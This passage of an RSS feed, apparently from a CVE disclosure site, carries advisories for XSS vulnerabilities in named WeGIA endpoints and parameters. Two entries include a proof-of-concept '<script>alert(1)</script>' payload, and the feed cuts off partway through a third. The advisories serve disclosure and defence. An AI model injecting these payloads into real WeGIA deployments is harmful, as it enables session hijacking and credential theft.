&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22596&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22596&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;modulos_visiveis.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;modulos_visiveis.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22596-cross-site-scripting-xss-reflected-endpoint-modulos_visiveisphp-parameter-msg_c&amp;#34;&amp;gt;CVE-2025-22596: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;modulos_visiveis.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22596&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22596&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;modulos_visiveis.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;modulos_visiveis.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22596/401163815-ade39683-d2f0-4cae-b9de-76dafd244921.png&amp;#34;
	width=&amp;#34;808&amp;#34;
	height=&amp;#34;471&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22596/401163815-ade39683-d2f0-4cae-b9de-76dafd244921_hu_c3ac08fb7c09058c.png 480w, /p/cve-2025-22596/401163815-ade39683-d2f0-4cae-b9de-76dafd244921_hu_a5701c0c08bf0889.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;171&amp;#34;
		data-flex-basis=&amp;#34;411px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jcj3-gqj3-rrvm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jcj3-gqj3-rrvm&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 10 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22597</title>
        <link>https://www.cvehunters.com/p/cve-2025-22597/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22597/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22597-cross-site-scripting-xss-stored-endpoint-cobrancacontrollerphp-parameter-local_recepcao&amp;#34;&amp;gt;CVE-2025-22597: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;CobrancaController.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;local_recepcao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22597&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22597&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;CobrancaController.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;local_recepcao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/socio/sistema/controller/CobrancaController.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22597-cross-site-scripting-xss-stored-endpoint-cobrancacontrollerphp-parameter-local_recepcao&amp;#34;&amp;gt;CVE-2025-22597: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;CobrancaController.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;local_recepcao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22597&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22597&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;CobrancaController.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;local_recepcao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/socio/sistema/controller/CobrancaController.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;local_recepcao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;local_recepcao&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22597/401166190-1f8c9174-0d2f-435b-ba79-00802f86ba90.png&amp;#34;
	width=&amp;#34;810&amp;#34;
	height=&amp;#34;514&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22597/401166190-1f8c9174-0d2f-435b-ba79-00802f86ba90_hu_18afd47f918c912d.png 480w, /p/cve-2025-22597/401166190-1f8c9174-0d2f-435b-ba79-00802f86ba90_hu_7e3b22d34116d79a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;157&amp;#34;
		data-flex-basis=&amp;#34;378px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mgj3-g922-2r9v&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mgj3-g922-2r9v&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 10 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22598</title>
        <link>https://www.cvehunters.com/p/cve-2025-22598/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22598/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22598-cross-site-scripting-xss-stored-endpoint-cadastrarsociophp-parameter-nome&amp;#34;&amp;gt;CVE-2025-22598: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;cadastrarSocio.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22598&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22598&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastrarSocio.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/contribuicao/php/cadastrarSocio.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22598-cross-site-scripting-xss-stored-endpoint-cadastrarsociophp-parameter-nome&amp;#34;&amp;gt;CVE-2025-22598: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;cadastrarSocio.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22598&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22598&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;cadastrarSocio.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
